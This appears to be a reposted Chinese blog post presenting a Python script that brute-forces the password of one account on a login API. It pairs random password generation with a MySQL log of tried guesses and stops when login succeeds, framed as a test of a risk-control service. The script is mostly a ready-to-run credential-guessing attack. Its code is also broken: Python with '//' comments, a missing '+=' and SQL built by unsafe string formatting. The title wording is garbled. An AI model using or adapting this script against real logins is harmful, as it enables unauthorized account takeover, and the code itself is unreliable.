使用Python暴力激活成功教程密码

2022-09-23 11:09:12 浏览数 (2)

大家好,又见面了,我是你们的朋友全栈君

由于业务需求,今天项目对接了百度云智能的风控系统,注册和登陆保护,想来测试一下性能,用python写了一个脚本,暴力激活成功教程密码,看看会不会触发风控

一、首先在本地新建了一个数据库,保存已经试错过的密码

CREATE TABLE `test`.`pwd` ( `id` int(10) NOT NULL AUTO_INCREMENT, `passwod` varchar(20) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL DEFAULT ”, `status` int(10) NOT NULL DEFAULT 0, PRIMARY KEY (`id`) USING BTREE, UNIQUE INDEX `id`(`id`) USING BTREE, INDEX `pwd`(`passwod`) USING BTREE ) ENGINE = MyISAM AUTO_INCREMENT = 1 CHARACTER SET = latin1 COLLATE = latin1_swedish_ci ROW_FORMAT = Dynamic;

不需要多,两个字段就好

给密码字段加个索引,方便数据量大的时候查询

二、写脚本

代码语言:javascript复制
import requests
import random
import json
import pymysql

class login:
    def randomStr():
        s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        salt = ''
        //根据规则随机生成6-20位的字符串
        i = random.randint(6,20)
        for i in range(i):
            salt  = random.choice(s)
        return salt

url = "http://www.api.com/api/User/login"
pymysql.install_as_MySQLdb()
db = pymysql.connect("localhost", "root", "", "test")
cursor = db.cursor()
while(True):
    salt = login.randomStr()
    //查询数据库中有没有已经有这个新生成的密码,有的话,重新生成一个,没有就插入一条
    sql = "select * from pwd where passwod='%s'" % salt
    r = cursor.execute(sql)
    result = cursor.fetchone()
    if(result != None):
        salt = login.randomStr()
    data = {"account": "134********", "password": salt, "imei": ""}
    res = requests.post(url=url,json=data)
    insertSql = "insert into pwd(`passwod`) values('%s')" % (salt)
    print(insertSql)
    try:
        cursor.execute(insertSql)
        db.commit()
    except:
        db.rollback()
    json_str = json.loads(res.text)
    print("随机密码:",salt)
    print("Python 原始数据:", json_str)
    //登陆成功之后退出
    if(json_str.get('code') == 1):
        print("登陆成功")
        exit()
    print("JSON 对象:", json_str.get('data').get('msg'))

这样一个简单的脚本就写好了,自动跑去吧

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/172185.html原文链接:https://javaforall.cn

0 人点赞